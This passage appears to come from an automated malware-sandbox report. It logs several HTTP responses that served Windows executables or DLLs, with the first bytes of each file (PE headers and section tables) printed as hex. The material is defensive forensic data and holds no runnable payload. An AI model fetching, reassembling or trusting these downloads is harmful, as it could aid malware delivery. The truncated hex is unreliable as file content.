00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 11:56:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 11:56:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 11:57:01 GMTContent-Type: application/octet-streamContent-Length: 393728Last-Modified: Thu, 12 Dec 2024 07:55:00 GMTConnection: keep-aliveETag: "675a96d4-60200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 67 05 00 64 00 00 00 00 30 06 00 98 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 61 05 00 00 10 00 00 00 62 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ab 00 00 00 80 05 00 00 60 00 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 7a 1e 00 00 30 06 00 00 3c 00 00 00 c6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 11:57:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 11:57:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 11:57:07 GMTContent-Type: application/octet-streamContent-Length: 2660864Last-Modified: Thu, 12 Dec 2024 23:33:40 GMTConnection: keep-aliveETag: "675b72d4-289a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 28 00 00 04 00 00 64 6d 29 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 18 25 00 28 00 00 00 00 40 25 00 25 fb 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 28 00 1c 7f 00 00 80 0d 25 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0c 25 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 24 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 32 af 24 00 00 10 00 00 00 b0 24 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 5e 00 00 00 c0 24 00 00 60 00 00 00 b4 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 14 00 00 00 20 25 00 00 0a 00 00 00 14 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 25 fb 02 00 00 40 25 00 00 fc 02 00 00 1e 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 7f 00 00 00 40 28 00 00 80 00 00 00 1a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 11:57:10 GMTContent-Type: application/octet-streamContent-Length: 2660864Last-Modified: Thu, 12 Dec 2024 23:33:40 GMTConnection: keep-aliveETag: "675b72d4-289a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 28 00 00 04 00 00 64 6d 29 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 18 25 00 28 00 00 00 00 40 25 00 25 fb 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 28 00 1c 7f 00 00 80 0d 25 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0c 25 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 24 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 32 af 24 00 00 10 00 00 00 b0 24 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 5e 00 00 00 c0 24 00 00 60 00 00 00 b4 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 14 00 00 00 20 25 00 00 0a 00 00 00 14 25 00 00 00 00 00 00 00 00 00 00 